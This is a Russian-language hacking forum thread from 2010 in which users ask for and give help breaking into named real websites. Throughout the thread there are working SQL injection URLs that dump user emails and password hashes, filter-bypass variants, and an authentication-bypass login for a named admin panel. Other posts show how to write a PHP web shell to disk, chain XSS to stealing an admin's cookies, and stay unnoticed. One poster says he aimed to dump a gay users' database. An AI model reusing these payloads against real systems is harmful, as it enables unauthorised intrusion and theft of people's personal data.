Просмотр полной версии : Ваши вопросы по уязвимостям.
budden said:
Есть инклуд (линукс), но слэш (/) вырезается. Никаких других способов подняться на директорию вверх (../) нет, ведь?
/thread98525.html
хотья не факт..
Вот так перебрал до 50, результат - ничего не найдено
Дальше терпения не хватило? Или ты думаешь, что всё заканчивается на 50-ой таблице? =\
Table 'krost.USER' doesn't exist
Таблица в другой бд
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+selECt+1,2,table_schem a,4,5,database(),7,8,9+from+information_schema.col umns+where+table_name='USER'+limit+1,100+--+
Запрос к этой таблице в бд mysql
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8 ,9+from+mysql.user+--+
budden said:
Есть инклуд (линукс), но слэш (/) вырезается. Никаких других способов подняться на директорию вверх (../) нет, ведь?
https://rdot.org/forum/showpost.php?p=3323&postcount=16
nimferus, смотри позицию последней table_column через метод тыка аля limit 1000,1 - false делим на 2 limit 500,1 - true значит больше 500 и меньше 1000, limit 750,1 - false.. ну ты понел.. когда знаем точное число запускаем цикл аля for(int i=0;i
Чакэ said:
nimferus, смотри позицию последней table_column через метод тыка аля limit 1000,1 - false делим на 2 limit 500,1 - true значит больше 500 и меньше 1000, limit 750,1 - false.. ну ты понел..
Это что еще за изврат?!
select count(*) from information_schema.columns
И все!
nimferus
03.11.2010, 18:17
Всем спасибо, немного разобрался, пойду дальше пыхтеть)
brutos said:
Это что еще за изврат?!
select count(*) from information_schema.columns
И все!
извините ступил.. вроде sql не первый год юзаю а в скуль не додумался такое ставить.. черт.
есть 2 базы
inform.schema
data
делаю такой запрос:
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users --
пишет что не существует поля email
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users.data --
и так
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from data.users --
тоже самое
Помогите разобраться с запросом, через тулзу по одному не вариант в базе 10k юзеров
ALIM said:
есть 2 базы
inform.schema
data
делаю такой запрос:
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users --
пишет что не существует поля email
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users.data --
и так
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from data.users --
тоже самое
Помогите разобраться с запросом, через тулзу по одному не вариант в базе 10k юзеров
попробуй unhex(hex()) , aes_encrypt
ALIM said:
Помогите разобраться с запросом,
Как здесь можно помочь разобраться с запросом- если мы не знаем настоящую ссылку? Ведь насколько я помню доменная зона
om обычно используется с приставкой net (net.om) покрайней мере по твоей ссылке зайти не могу и гугл домен sffaoss.om - незнает.....
P.S. Или это только у меня ???
Привет, такая ситуация, есть инъекция в селекте, есть file_priv, кавычки не экранируются, есть фулл пасс к сайту. Но проблема в том, что, как я понял, прав на запись во что-то, видное из инета, не хватает - я могу записать в /tmp, но куда-то на сайт - нет. На сайте нету форм аплоада, в админке тоже нету, видимо картинки грузятся по фтп. Соседние сайты такие же ущербные, по крайней мере, на первый взгляд. Если я правильно понимаю, единственный вариант залить шелл в подобных условиях - найти писабельную папку? Ось freebsd, но при load_file папки я вижу несколько левых символов, но не вижу листинг файлов (почему такое может быть?). Какие есть тулзы для поиска форм аплоада? Спасибо
1. залей в /tmp
2. ищи инклуд
3. подцепи шеллик
Gorev said:
попробуй unhex(hex()) , aes_encrypt
http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(GROUP_CONCAT(e-mail),0x71),0x71),4%20from%20user%20--
Используя такую конструкцию выводится только 10 последних записей. Каким образом можно вывести все данные?
ALIM said:
http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(GROUP_CONCAT(e-mail),0x71),0x71),4%20from%20user%20--
Используя такую конструкцию выводится только 10 последних записей. Каким образом можно вывести все данные?
вручную через лимит по одной записи, все через утилиту...
http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(CONCAT(e-mail),0x71),0x71),4+from+user+limit+0,1--
лимитом перебирай
ALIM said:
http://www.baywindows.com/index.php?ch=news&sc=glbt&sc3=&id=106949%20and%201=2%20union%20select%20aes_decry pt(aes_encrypt(GROUP_CONCAT(email),0x71),0x71),2,3 ,4,5,6,7,8,9,10%20from%20users --
хотел слить базу гомиков, если кто-нибудь обьяснит в личку каким образом можно было слить всю базу, а не по одному скажу спасибо
что тут обьяснять? я же тебе выше написал, используй тулзу какую нибудь, например сипт или панголин...делов то...
Вопрос: Могу исполнять html, как залить шшел?
EoGeneo said:
Вопрос: Могу исполнять html, как залить шшел?
мы рады за Вас, одно фигово :то что ты написал- не взаимосвязанно
Kusto said:
мы рады за Вас, одно фигово :то что ты написал- не взаимосвязанно
Я знаю, уже все что можно перепробовал, отчаялся и написал....мало ли
EoGeneo said:
Я знаю, уже все что можно перепробовал, отчаялся и написал....мало ли
А то, что HTML - это язык гипертекстовой разметки, тебе не пришло в голову?
EoGeneo said:
Вопрос: Могу исполнять html, как залить шшел?
Потому что гладиолус ! какой вопрос, таков и ответ.
Ну впринципе, теоритически шелл залить можно.
Исполнение HTML -> Исполнение JS -> Куки админа -> Бажный скрипт аплоада файлов в админ панели -> Шелл
JohnnyBGoode
05.11.2010, 01:53
помогите админку найти...если она тут есть
http://pixca.ru
Нашол такие ошибки)
http://www.enzymedica.com/pdf/404.php
и
http://www.enzymedica.com/online.php
Можно ли с них что нибудь выжать? )
помогите админку найти...если она тут есть
http://pixca.ru
http://pixca.ru/account.php
http://pixca.ru/login.php
есть какой-нибудь веб-шелл для coldfusion?
rooopster
05.11.2010, 20:10
привет, каким софтом можно побыстрее сдампить большую базу?
rooopster said:
привет, каким софтом можно побыстрее сдампить большую базу?
В таких случаях принято писать какая база.
rooopster
05.11.2010, 20:25
Redwood said:
В таких случаях принято писать какая база.
прошу прощения, mysql, вывод через юнион
пробовал /showpost.php?p=2332238&postcount=1 но он что-то приказал долго жить
сдампить надо 300к записей по 6 колонок
Seravin said:
есть какой-нибудь веб-шелл для coldfusion?
http://pastebin.com/Rj1cnyyH
GroM88 said:
Нашол такие ошибки)
http://www.enzymedica.com/pdf/404.php
и
http://www.enzymedica.com/online.php
Можно ли с них что нибудь выжать? )
Нет
rooopster said:
прошу прощения, mysql, вывод через юнион
пробовал /showpost.php?p=2332238&postcount=1 но он что-то приказал долго жить
сдампить надо 300к записей по 6 колонок
http://rghost.ru/3157486
rooopster
05.11.2010, 23:37
Redwood said:
http://rghost.ru/3157486
Спасибо
JohnnyBGoode
06.11.2010, 16:07
http://www.site.com/system/lenta_day.cfm?nn=1
При подстановке кавычки либо какого-то запроса выдает
Code:
Error Diagnostic Information
Invalid parameter type
Cannot convert 1' to number.
Please, check the ColdFusion manual for the allowed conversions between data types
The error occurred while processing an element with a general identifier of (CFPARAM), occupying document position (11:1) to (11:60) in the template file C:\Inetpub\IQ\SITE\system\lenta_day.cfm.
А если ввожу http://www.site.com/system/lenta_day.cfm?nn=2-1 выдает
Code:
Error Diagnostic Information
An error occurred while evaluating the expression:
#Application.types_lists[TypeCont]#
Error near line 122, column 47.
The element at position 40209 in dimension 1 of object "Application.types_lists" cannot be found. The object has elements in positions 1 through 506. Please, modify the index expression.
The error occurred while processing an element with a general identifier of (#Application.types_lists[TypeCont]#), occupying document position (122:23) to (122:57) in the template file C:\INETPUB\IQ\SITE\SYSTEM\LENTA_DAY.CFM.
Что здесь,есть уязвимость вообще или нет,и если есть как быть ? Первый раз просто такое встретил
Подскажите, пожалуйста, тулзу, которая лучше всего подходит для блайнд инъекции в mysql?
roddik said:
Подскажите, пожалуйста, тулзу, которая лучше всего подходит для блайнд инъекции в mysql?
Havij
Gedj said:
Havij
Не соглашусь. Havij проводит инъекцию в один поток, очень долго ждать приходится. В этом плане лучше Pangolin.
brutos said:
Не соглашусь. Havij проводит инъекцию в один поток, очень долго ждать приходится. В этом плане лучше Pangolin.
Да, Havij - это вообще ужос для этого, о Pangolin слышал, что разработчики встраивают вирусы - ставить стремно, виртуалку - лень. Помню видел, кто-то выкладывал тут скрипт, который работает по принципу определения ключевиков для страниц по айдишникам, то есть получается 26 + 10 запросов для alnum значений для определения ключевиков, а потом читает по символу за запрос. Только сейчас не нашел, напомните плз
http://www.hjertebanken.dk/view_profile.asp?userid=117744' прошу помочь со следуюшей ситуацией
Не могу раскрутит никак
http://www.hjertebanken.dk/view_profile.asp?userid=117744' прошу помочь со следуюшей ситуацией
Не могу раскрутит никак
с чего вы взяли что там инъекция...
roddik said:
Подскажите, пожалуйста, тулзу, которая лучше всего подходит для блайнд инъекции в mysql?
/thread119047.html
MastaBass1
08.11.2010, 23:48
Помогите найти админку, или форму входа http://www.pulkovoairport.ru/ .=)
MastaBass1 said:
Помогите найти админку, или форму входа http://www.pulkovoairport.ru/ .=)
HTML:
order allow,deny allow from all deny from www.nosuchsite.ru. php_value session.use_trans_sid 0 php_value display_errors 1 php_value error_reporting 15 php_value upload_max_filesize 25M RewriteEngine On RewriteRule ^(admin)/$ /admin/index.php [R] RewriteRule ^(admin)/(constr)$ /admin/constr.php [R] RewriteRule ^(admin)/(mydbadmin)$ /admin/mydbadmin.php?kos [R] #RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^(eng/)?(.*)$ index.php?action=$2&%{QUERY_STRING}&lng=$1 [L] #RewriteRule ^(.*)$ index.php?action=$1&%{QUERY_STRING} [L]
MastaBass1
09.11.2010, 00:31
NemTaq said:
HTML:
order allow,deny allow from all deny from www.nosuchsite.ru. php_value session.use_trans_sid 0 php_value display_errors 1 php_value error_reporting 15 php_value upload_max_filesize 25M RewriteEngine On RewriteRule ^(admin)/$ /admin/index.php [R] RewriteRule ^(admin)/(constr)$ /admin/constr.php [R] RewriteRule ^(admin)/(mydbadmin)$ /admin/mydbadmin.php?kos [R] #RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^(eng/)?(.*)$ index.php?action=$2&%{QUERY_STRING}&lng=$1 [L] #RewriteRule ^(.*)$ index.php?action=$1&%{QUERY_STRING} [L]
Пардон, но что это за бред?
http://www.pulkovoairport.ru/.htaccess
MastaBass1
09.11.2010, 00:34
NemTaq said:
http://www.pulkovoairport.ru/.htaccess
Так админка то где, этот файл же просто формирует страницу....?
IMMORTAL_S
09.11.2010, 02:34
не могу попасть на страницы... программно
Всем привет!
Пытаюсь получить содержимое страницы программно (не из браузера), но ниче не получается... в ответ приходит какая та херня:
При одном и том же запросе, может выдать такое:
HTML:
Site Secure
или такое (всегда такой, когда пробовал на php):
HTML:
var strbuf = new Array();strbuf[15]='+5y';strbuf[14]='mu';strbuf[13]='9M';strbuf[12]='waHA';strbuf[11]='tA';strbuf[10]='BYt';strbuf[9]='y5';strbuf[8]='?+S';strbuf[7]='YnYT';strbuf[6]='oWWA';strbuf[5]='/aWQ';strbuf[4]='Q==';strbuf[3]='9wa';strbuf[2]='G90b';strbuf[1]='/j';strbuf[0]='+z';var arr=[1,8,7,14,0,11,6,10,15,3,2,9,12,5,13,4];var b='';for (q = 0;q
Хочу блинд раскрутить, но недопру как содержимое страницы получить... постоянно в ответ приходит такой код.
Может кто направит мысль в нужную сторону
Отлови Header'ы которые передаёт браузер, и проставь их в софте.
IMMORTAL_S
09.11.2010, 12:48
Charle said:
Отлови Header'ы которые передаёт браузер, и проставь их в софте.
Ы) постоянно забываю про это... все отлично Сори за тупость
сервак фильтрует:
union и select , не помогает смена регистра букв (сервак на винде) и заключение операторов в комментарии /*!select*/
может есть еще какие-то способы? база mysql 5.0.51a
сорвак Apache/2.2.15 (Win32) mod_ssl/2.2.15 OpenSSL/0.9.8m PHP/5.2.13
durito said:
сервак фильтрует:
union и select , не помогает смена регистра букв (сервак на винде) и заключение операторов в комментарии /*!select*/
может есть еще какие-то способы? база mysql 5.0.51a
сорвак Apache/2.2.15 (Win32) mod_ssl/2.2.15 OpenSSL/0.9.8m PHP/5.2.13
Если включен вывод ошибок, то попробуйте
Code:
or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -
Фараон said:
Если включен вывод ошибок, то попробуйте
Code:
or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -
вывод ошибок выключен
версию смог вывести подзапросом в слепую, но дальше тупик. select в подзапросах фильтруется
пробуй:
%53%45%4C%45%43%54
/*!SELECT*/
/*!12345SELECT*/ если mysql5
/*!%53%45%4C%45%43%54*/
SeLeCT
SEL/**/ECT
pinch said:
пробуй:
%53%45%4C%45%43%54
/*!SELECT*/
/*!12345SELECT*/ если mysql5
/*!%53%45%4C%45%43%54*/
SeLeCT
SEL/**/ECT
во всех вариантах кроме последнего редиретит на главную страницу.
последний запрос SEL/**/ECT не редиректит, но выдает неверный результат
to durito может ссылку кинешь? че гадать то..
to MastaBass1 файл .htaccess не формирует страницу, а локально переопределяет настройки сервера для текущей директории и во всех внутренних поддиректориях. В добавок он меняет настройки php.
MastaBass1
10.11.2010, 21:42
mr.celt said:
to
durito
может ссылку кинешь? че гадать то..
to
MastaBass1
файл .htaccess не формирует страницу, а локально переопределяет настройки сервера для текущей директории и во всех внутренних поддиректориях. В добавок он меняет настройки php.
Так где админка?=)
Вот смотрите есть Адрес Сервера 82.137.162.97
это универский сервер)
как на него можно зайти с домашнего компа ?)
препод сказал, что на него можно зайти даже через эксплориал, только как?
Ryzpm said:
Вот смотрите есть Адрес Сервера 82.137.162.97
это универский сервер)
как на него можно зайти с домашнего компа ?)
препод сказал, что на него можно зайти даже через эксплориал, только как?
http://82.137.162.97/ не?
и что такое "эксплориал"?
Браузер стандартный)
Было б все так просто я б не написал тут)
Vollkorn
11.11.2010, 00:05
Люди, а если через скуль записать в пхп файл что то типа прокатит? Будет работать?
Vollkorn said:
Люди, а если через скуль записать в пхп файл что то типа прокатит? Будет работать?
Будет, но чтобы шелл проинклудился, директива allow_url_include на сервере, должна быть в положении On.
DeepBlue7
11.11.2010, 00:14
Vollkorn said:
Люди, а если через скуль записать в пхп файл что то типа прокатит? Будет работать?
Если есть права на инклюд внешних файлов - то да. А почему бы тебе не писать туда сразу чот тип
Code:
?
DeepBlue7 said:
Если есть права на инклюд внешних файлов - то да. А почему бы тебе не писать туда сразу чот тип
Code:
?
Он не спросил, что ему лучше писать, а спросил, будет ли работать конкретный пример. И ненадо советовать лить system, так как эта функция может не работать на сервере (отключена через disable_functions) или на нее могут быть наложены ограничения (safe mod - on, с установленной директивой safe_mode_exec_dir) и плюс ко всему, это не очень рационально, так как набор команд у system ограничен лишь системными командами и если на сервере нету установленных качалок, то залить полноценный шелл становится проблематично, лучше использовать eval или assert.
Vollkorn said:
Люди, а если через скуль записать в пхп файл что то типа прокатит? Будет работать?
У вас нарушен синтаксис.
Попробуйте так:
PHP:
И при заходе на 1.php будет шелл.
Люди, а если через скуль записать в пхп файл что то типа прокатит? Будет работать?
если конечно у вас права дам будут хоть пиши helloworld=)
права, права полную свободу взломщикам...
DeepBlue7
11.11.2010, 00:48
Redwood said:
и ненадо советовать писать шелл через system, так как эта функция может быть отключена на сервере
Попытка - не пытка. А говоря о eval, и assert, они с таким же успехом могуть быть отключены... хотя, и реже...
Да мне прост первый вариант если не пашет внешний инклюд в голову влетел - писать system()
помогите понять на живом примере:
хочу выяснить есть ли xss уязвимость на сайте делаю раз: вставляю код проверки ">alert()
получаем
http://trueimages.ru/img/6f/ab/dd78cb7461128d8a6e667dfd6bc.jpg
я так пеонимаю фильтр стоит или все таки сработало?
делаю два:
Просто в поле вводим: '';!--"=&{()} получаем
http://trueimages.ru/img/2c/8c/0b2624c5d01cd71752aca98cc71.jpg
пропало слово тест,что это значит?
Дальше открываем html страничку и ищем слово "test"
http://trueimages.ru/img/80/6f/1ec59bd54f1b3ca61fbba93205c.jpg
и смотри последующие сиволы..
Если <> так и остались то это перваый признак уязвимости - значит фильтр имеет дырку.
Если ,"'\ символы остались такими, как были введены - это второй признак уязвимости - возможные дополнительные символы к последующей XSS атаке.
<> - они остались значит фильтра нет?
';!--" - оно все так и осталось значит это второе знамение о том что фильтр не робит и я нашел уязвимость???
Вообщем имеется сайт.
Есть доступ к mysql.user, Версия мускула 5.0.32-Debian_7etch8-log
bd работает под root, file_priv Y
Прочитать конфиг сервера через load_file() не получается почемуто = \
Так же в ошибке я вижу путь вида
/home/u1234/site.ru/www/file.php
В бд есть разные интересные таблицы, например нашол таблицу ftpuser с колонками:
id, userid, passwd, uid, gid, homedir
Но проблема в том что я из колонок таким запросом немогу ничего вывести.
+union+select+1,userid,3,4,5,6,7,8,9,10+from+ftpus er+limit+0,1+--+
Причем из любой таблицы и из лбой колонки. При таком запросе мне просто выдает ошибку. Если бы колонки были пустые, ошибки не было бы, просто показывало бы пустоту в 2ечке)
Есть у кого каикие нить соображения как вывести инфу из колонок ? или мб можно что то замутить с Y привилегией? )
Expl0ited
11.11.2010, 11:47
GroM88 said:
Вообщем имеется сайт.
Есть доступ к mysql.user, Версия мускула 5.0.32-Debian_7etch8-log
bd работает под root, file_priv Y
Прочитать конфиг сервера через load_file() не получается почемуто = \
Так же в ошибке я вижу путь вида
/home/u1234/site.ru/www/file.php
В бд есть разные интересные таблицы, например нашол таблицу ftpuser с колонками:
id, userid, passwd, uid, gid, homedir
Но проблема в том что я из колонок таким запросом немогу ничего вывести.
+union+select+1,userid,3,4,5,6,7,8,9,10+from+ftpus er+limit+0,1+--+
Причем из любой таблицы и из лбой колонки. При таком запросе мне просто выдает ошибку. Если бы колонки были пустые, ошибки не было бы, просто показывало бы пустоту в 2ечке)
Есть у кого каикие нить соображения как вывести инфу из колонок ? или мб можно что то замутить с Y привилегией? )
Code:
+union+select+1,'',3,4,5,6,7,8,9,10+into+outfile+'/home/u1234/site.ru/www/shell.php'+--+
шелл будет тут site.ru/shell.php
Gordiy said:
помогите понять на живом примере:
хочу выяснить есть ли xss уязвимость на сайте делаю раз: вставляю код проверки
">alert()
получаем
http://trueimages.ru/img/6f/ab/dd78cb7461128d8a6e667dfd6bc.jpg
я так пеонимаю фильтр стоит или все таки сработало?
делаю два:
Просто в поле вводим:
'';!--"=&{()}
получаем
http://trueimages.ru/img/2c/8c/0b2624c5d01cd71752aca98cc71.jpg
пропало слово тест,что это значит?
Дальше открываем html страничку и ищем слово "test"
http://trueimages.ru/img/80/6f/1ec59bd54f1b3ca61fbba93205c.jpg
и смотри последующие сиволы..
<> - они остались значит фильтра нет?
';!--" - оно все так и осталось значит это второе знамение о том что фильтр не робит и я нашел уязвимость???
да там есть уязвимость
а вы не подскажите какой из факторов указал вам на это?
Expl0ited
11.11.2010, 12:00
вот этот скрин: http://trueimages.ru/img/80/6f/1ec59bd54f1b3ca61fbba93205c.jpg
фильтрация недостаточная раз пропускает все символы, вследствии чего можно сделать вывод что cross-site-scripting возможен.
Вообщем имеется сайт.
Есть доступ к mysql.user, Версия мускула 5.0.32-Debian_7etch8-log
bd работает под root, file_priv Y
Прочитать конфиг сервера через load_file() не получается почемуто = \
Так же в ошибке я вижу путь вида
/home/u1234/site.ru/www/file.php
В бд есть разные интересные таблицы, например нашол таблицу ftpuser с колонками:
id, userid, passwd, uid, gid, homedir
Но проблема в том что я из колонок таким запросом немогу ничего вывести.
+union+select+1,userid,3,4,5,6,7,8,9,10+from+ftpus er+limit+0,1+--+
Причем из любой таблицы и из лбой колонки. При таком запросе мне просто выдает ошибку. Если бы колонки были пустые, ошибки не было бы, просто показывало бы пустоту в 2ечке)
Есть у кого каикие нить соображения как вывести инфу из колонок ? или мб можно что то замутить с Y привилегией? )
значит таблицы в другой базе.
1. Узнаем базу под которой работает необходимая таблица
id=1+union+select+1,2,3,4,5,6,7,8,table_schema+fro m+information_schema.tables+where+table_name='им я_таблицы'--
2. Делаем запрос
id=1+union+select+1,userid,3,4,5,6,7,8,9,10+from+ мя_базы.ftpuser--
auth_root
11.11.2010, 16:35
Помогите раскрутить
Не могу вывести колумны. По коунт кол-во 453, могу посмотреть.Вывести не могу.
Стял mod_security, обошел, а вот что еще фильтруется не пойму.
http://littlehouseofhats.us/collection_details.php?ID=130'/**/and/**/(1=0)/**//*!union*/+/*!select*/+1,count(column_name),3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23+from+information_schem a.%60columns%60--+
http://littlehouseofhats.us/collection_details.php?ID=-130'+/*!UNION*/+SELECT+COLUMN_NAME,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23+FROM+INFORMATION_SCHEM A.COLUMNS+LIMIT+10,1%23
rooopster
11.11.2010, 18:02
привет, подскажите в пм вход в админку http://www.fortline.ru/ , пожалуйста
[Feldmarschall]
11.11.2010, 18:40
rooopster said:
привет, подскажите в пм вход в админку http://www.fortline.ru/ , пожалуйста
https://www.fortline.ru/manager/
+
http://www.fortline.ru/cms/index.php
------------------
LOGIN: 1' or 1=1# 1
PASS: hgfjhgjtgfjthitufikjk
+в админке sql inj.
http://www.fortline.ru/cms/edit_cl.php?id=9'+or+(select+count(*)+from+informa tion_schema.tables+group+by+concat(version(),floor (rand(0)*2)))--+
P.S http://www.fortline.ru/cms/access.php
MastaBass1
11.11.2010, 19:05
"]
[Feldmarschall] said:
https://www.fortline.ru/manager/
+
http://www.fortline.ru/cms/index.php
------------------
LOGIN:
1' or 1=1# 1
PASS:
hgfjhgjtgfjthitufikjk
+в админке sql inj.
http://www.fortline.ru/cms/edit_cl.php?id=9'+or+(select+count(*)+from+informa tion_schema.tables+group+by+concat(version(),floor (rand(0)*2)))--+
P.S http://www.fortline.ru/cms/access.php
Слушай класс, а не можешь какой-нибудь мануал по такой уязвимости скинуть? Как так?
И вот такой вопрос на неком сайте вставляю такую же конструкцию, он мне выдает:
Введите Ваш логин и пароль 1\' or 1=1# 1
Тесть к кавычке подставляет слеш, как обойти?
DeepBlue7
11.11.2010, 20:58
MastaBass1 said:
Слушай класс, а не можешь какой-нибудь мануал по такой уязвимости скинуть? Как так?
И вот такой вопрос на неком сайте вставляю такую же конструкцию, он мне выдает:
Введите Ваш логин и пароль 1\' or 1=1# 1
Тесть к кавычке подставляет слеш, как обойти?
О боже. В наше время, уже доволько редко встречается. В твоем случае, скорее всего там есть фильтрация... скорее всего, даже можеш не пытатся or-ом)).
Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?
DeepBlue7
12.11.2010, 00:05
Mirrey said:
Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?
Code:
select concat(user,0x2f,FILE_PRIV) from mysql.user limit 1,1--
Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?
Проверяем права на запись и чтение файлов
id=1+union+select+1,2,3,4,file_priv+from+mysql.use r+where+user='root'--
Y-есть права
N-нет прав
Mirrey said:
Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?
а поиск на форуме поискать влом? сколько можно на одни и те же вопросы отвечать....просто 3.14здец полнейший...опять каникулы что ли?
pinch said:
Проверяем права на запись и чтение файлов
id=1+union+select+1,2,3,4,file_priv+from+mysql.use r+where+user='root'--
Y-есть права
N-нет прав
Сообщение от Mirrey
Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?
Код:
select concat(user,0x2f,FILE_PRIV) from mysql.user limit 1,1--
Вы несколько не правы, так как может быть несколько юзеров и соответственно различные права, поэтому нужно узнать под кем мы сидим, для этого используется
id=1+union+select+1,2,3,4,user()--
а затем уже проверять конкретного
id=1+union+select+1,2,3,4,file_priv+from+mysql.use r+where+user='наш юзер под которым сидим'--
DeepBlue7
12.11.2010, 17:10
Jer1cho said:
Сделал через (там кавчки не обязательны), если кому интересно.
...
Еще вопрос может ли браузер с какими-нибудь параноидальными дополнениями (есть ли вобще такие?) на безопасность заорать на +document.cookie, или антивирус засечь такое? очень важно чтобы никто не заметил.
Не думаю. Обычно параноики юзают NoScript, или просто тупо отрубают жабу.
MastaBass1
12.11.2010, 18:39
Так помогите найти админку то на http://www.pulkovoairport.ru/, нужно очень срочно!
JohnnyBGoode
12.11.2010, 21:17
Вытащил из БД хэш,расшифровал,при авторизации выдает ошибку.
Зарегистрировался там,вытащил свой хэш,при расшифровке не сходится с моим паролем.
Что тут такое ?
DeepBlue7
12.11.2010, 21:23
JohnnyBGoode said:
Вытащил из БД хэш,расшифровал,при авторизации выдает ошибку.
Зарегистрировался там,вытащил свой хэш,при расшифровке не сходится с моим паролем.
Что тут такое ?
Мож тупо совпадение, что удалось сбрутить, и там есть соль ?
JohnnyBGoode
12.11.2010, 22:08
Не знаю даже,помимо колонки password,откуда достал хэш,есть еще колонка hash,но оттуда что-то ничего не выводится
shell_c0de
13.11.2010, 13:19
ищи колумны password:hash:salt
или скинь в ПМ линк посмотрю и сбручу твой пароль )
подскажите пожалуйста что это за уязвимость
PHP:
http://userttool-258-www.bigpoint.net/
DeepBlue7
13.11.2010, 14:54
swat_ said:
подскажите пожалуйста что это за уязвимость
PHP:
http://userttool-258-www.bigpoint.net/
А с чего ты это взял, что это "уязвимость" ?. Прочитай ошибку.
Code:
Notice: failed to build language-file ut.login in /home/shared/include/XmlLanguageParser/1/XmlLanguageParser.class.php on line 103
JohnnyBGoode said:
Не знаю даже,помимо колонки password,откуда достал хэш,есть еще колонка hash,но оттуда что-то ничего не выводится
Проверьте:
PHP:
select count(hash)from table_name
Где hash - имя откуда у вас ничего "не выводится"
Если вывело "0", то нету записей.
помогите раскрутить скуль, стоит фильтрация на юнион
через name_const не выходит
http://www.thebartend.com/drinks/ShotsShooters/R.php?id=5714%20order%20by%209%20--
ALIM said:
помогите раскрутить скуль, стоит фильтрация на юнион
через name_const не выходит
http://www.thebartend.com/drinks/ShotsShooters/R.php?id=5714%20order%20by%209%20--
http://www.thebartend.com/drinks/ShotsShooters/R.php?id=5714+and+1=0+union(select+concat_ws(0x3a, user(),version(),database()),2,3,4,5,6,7,8,9)+--+
вот более простой способ:
http://www.thebartend.com/drinks/ShotsShooters/R.php?id=-5714+/*!UNION*/+SELECT+VERSION(),2,3,4,5,6,7,8,9--
DeepBlue7
14.11.2010, 00:21
Есть ли в паблике рабочий сплоит под Invision Power Board 2.3.6 версии ?
Заранее благодарю.
DeepBlue7 said:
Есть ли в паблике рабочий сплоит под Invision Power Board 2.3.6 версии ?
Заранее благодарю.
http://www.exploit-db.com/exploits/10304/
svesve said:
Друзья помогите найти админку
http://loesk.ru/
я уже все перерыл
https://loesk.ru/manager/
svesve said:
Спасибо! но это ISP
а там где-то должна быть панелька управления самой CMS
http://loesk.ru/myadmin/
Не знаю, может быть поможет.
Здесь есть SQL-inj?
http://www.vedicbooks.net/advanced_search_result.php?inc_subcat=1&keywords=Roy%20Eugene%20Davis&search_in_description=1'
FlaktW said:
Здесь есть SQL-inj?
http://www.vedicbooks.net/advanced_search_result.php?inc_subcat=1&keywords=Roy%20Eugene%20Davis&search_in_description=1'
нету
JohnnyBGoode
14.11.2010, 21:39
http://kommok.ru/index.php
Подскажите как здесь провести инъекцию.Метод POST,инъекция типа Blind,уязвимые параметры и в форме поиска ,и в форме голосования,по крайней мере так определил Acunetix Web Scanner
Я пока еще не очень дружу с Blind Sql,а тут плюс к этому еще и POST метод,что не добавляет удобства
JohnnyBGoode said:
http://kommok.ru/index.php
Подскажите как здесь провести инъекцию.Метод POST,инъекция типа Blind,уязвимые параметры и в форме поиска ,и в форме голосования,по крайней мере так определил Acunetix Web Scanner
Я пока еще не очень дружу с Blind Sql,а тут плюс к этому еще и POST метод,что не добавляет удобства
тулза от пашкелы, на форуме есть , юзай поиск
Тут есть скуль ?
http://sochi.com/pages/?id=-400+union+select+load_file('/etc/passwd')+from+mysql.user+--
По идее :
http://sochi.com/pages/?id=400
А с "-" выдаёт другой результат.
http://sochi.com/pages/?id=-400
BuG_4F said:
Тут есть скуль ?
http://sochi.com/pages/?id=-400+union+select+load_file('/etc/passwd')+from+mysql.user+--
По идее :
http://sochi.com/pages/?id=400
А с "-" выдаёт другой результат.
http://sochi.com/pages/?id=-400
Бред, нету конечно.
BuG_4F said:
Тут есть скуль ?
http://sochi.com/pages/?id=-400+union+select+load_file('/etc/passwd')+from+mysql.user+--
По идее :
http://sochi.com/pages/?id=400
А с "-" выдаёт другой результат.
http://sochi.com/pages/?id=-400
мдя.... слов нет....почитайка молодой человек про скули....
DeepBlue7
14.11.2010, 23:47
BuG_4F, ты не правильно понял мысль. проверяй, выполняется ли арифметическое действие, например ?id=400-1 , если появляется содержимое, которое должно появится при id=399, то можно говорить о иньекции.
svesve said:
Друзья помогите найти админку
http://loesk.ru/
я уже все перерыл
http://old.lenenergo.ru/files/
FlaktW said:
http://old.lenenergo.ru/files/
причем тут это?
MastaBass1
15.11.2010, 00:56
Такой вопрос, как написать цикл, для вывода 12 кэсов учеток, если уязвимо s_users , нужно вывести mail и password, не одна программа не смогла сдампить...
MastaBass1 said:
Такой вопрос, как написать цикл, для вывода 12 кэсов учеток, если уязвимо s_users , нужно вывести mail и password, не одна программа не смогла сдампить...
что вы имеете в виду "если уязвимо s_users" вопрос не понятен..
MastaBass1
15.11.2010, 01:29
Gorev said:
что вы имеете в виду "
если уязвимо s_users
" вопрос не понятен..
s_users это таблица из нее нужно вывести email: password.
кэсов??????? это что вообще такое???
MastaBass1
15.11.2010, 01:38
547 said:
кэсов??????? это что вообще такое???
Тысяч!
DeepBlue7
15.11.2010, 01:39
MastaBass1 said:
